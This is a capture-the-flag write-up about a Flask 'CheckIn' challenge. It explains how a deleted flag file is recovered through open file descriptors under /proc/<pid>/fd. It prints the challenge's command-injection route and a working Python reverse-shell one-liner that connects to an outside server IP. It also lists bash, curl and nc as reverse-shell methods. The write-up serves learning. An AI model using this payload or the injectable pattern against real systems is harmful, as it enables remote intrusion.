V&N recruitment CTF. I worked through the Web challenges and found them a bit heavy going, so I am writing up the knowledge points I learned while they are still fresh.
This challenge is called CheckIn, but it still has a certain degree of difficulty (maybe I am just too weak). The challenge hands you the Flask route source directly:
```python
from flask import Flask, request
import os

app = Flask(__name__)

flag_file = open("flag.txt", "r")
# flag = flag_file.read()
# flag_file.close()
#
# @app.route('/flag')
# def flag():
#     return flag
## want flag? naive!

# You will never find the thing you want:) I think
@app.route('/shell')
def shell():
    os.system("rm -f flag.txt")
    exec_cmd = request.args.get('c')
    os.system(exec_cmd)
    return "1"

@app.route('/')
def source():
    return open("app.py", "r").read()

if __name__ == "__main__":
    app.run(host='0.0.0.0')
```
You can see that the Flask app has two routes, "/" and "/shell". The flag is stored in flag.txt, and "/shell?c=<command>" executes a command.
But every request to /shell first runs "rm -f flag.txt", which deletes flag.txt, so we cannot simply cat flag.txt (in fact, even without the deletion we could not cat it directly, because the output of os.system is never echoed back in the response).
This leads to our first knowledge point: the file descriptor.
What is a file descriptor? The kernel accesses files through file descriptors. A file descriptor is a non-negative integer. When you open an existing file or create a new file, the kernel returns a file descriptor, and reading from or writing to the file also requires specifying the file descriptor of the file to be read or written.
In Python, for example, calling open() on a file creates a file descriptor; read() then reads the file contents through that descriptor, and close() closes/destroys the descriptor.
Where file descriptors are stored: /proc/<pid>/fd/<the id mentioned above>
In other words, we can read a file descriptor by cat-ing the corresponding entry in the process's fd directory.
Back to the challenge, and to the fifth line of the source:
```python
flag_file = open("flag.txt", "r")
```
Here open() is called on flag.txt before flag.txt is ever deleted, so a file descriptor for flag.txt is established before the deletion, and we can obtain the flag by reading the contents of this file descriptor.
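To make the point concrete, here is an added example (not part of the original write-up) that reproduces the open-then-delete pattern locally and reads the unlinked file back through /proc/self/fd/<n>, then shows that closing the handle removes the leak. It assumes a Linux /proc filesystem; the secret string is a constructed sample, not the challenge's flag.

```python
import os
import tempfile

# Constructed sample secret for this demonstration (not the challenge's flag).
SECRET = "flag{constructed_example}"


def leak_via_open_descriptor(secret: str = SECRET) -> dict:
    """Open a file, delete it while the handle stays open, and show that the
    data is still reachable through /proc/self/fd/<n> (Linux only)."""
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "flag.txt")
    with open(path, "w") as f:
        f.write(secret)

    # Same pattern as the challenge app: open() with no close(), then the
    # path is unlinked (the app does it with "rm -f flag.txt").
    handle = open(path, "r")
    os.remove(path)
    os.rmdir(tmpdir)  # the directory is empty now; the inode lives on

    result = {
        "path_exists_after_delete": os.path.exists(path),
        "via_handle": handle.read(),  # the original handle still reads it
        "proc_link": None,
        "via_proc": None,
    }

    # /proc/<pid>/fd/<n> is a magic link to the open inode, so opening it
    # re-reads the "deleted" file from offset 0; readlink ends in "(deleted)".
    fd = handle.fileno()
    proc_path = f"/proc/self/fd/{fd}"
    if os.path.isdir("/proc/self/fd"):
        result["proc_link"] = os.readlink(proc_path)
        with open(proc_path, "r") as via_proc:
            result["via_proc"] = via_proc.read()

    # Mitigation: close the handle (or read the file and close it at startup
    # instead of keeping it open). Once the last descriptor is gone the inode
    # is freed and the /proc entry with it, so nothing is left to read.
    handle.close()
    result["fd_gone_after_close"] = not os.path.exists(proc_path)
    return result
```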
But testing "/shell?c=<command>" showed that there is no output at all, so the next idea is our second knowledge point: the reverse shell.
The common ways to establish a reverse shell are bash, curl, nc, python -c, and so on, but testing showed that these commonly used commands were blocked here, so they could not be used to get a shell back.
Finally I tried python3 -c "command" and found that python3 could be executed, so I built the reverse shell with it directly:
```bash
python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("39.105.*.*",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash","-i"]);'
```
Passing this as the c parameter of the request gives us an interactive shell on our server.
Then cd /proc, cd into each <pid> directory (the numeric ones) in turn, and ls fd to get the descriptor ids.
Try cat fd/0, fd/1, ... one after another until the flag shows up.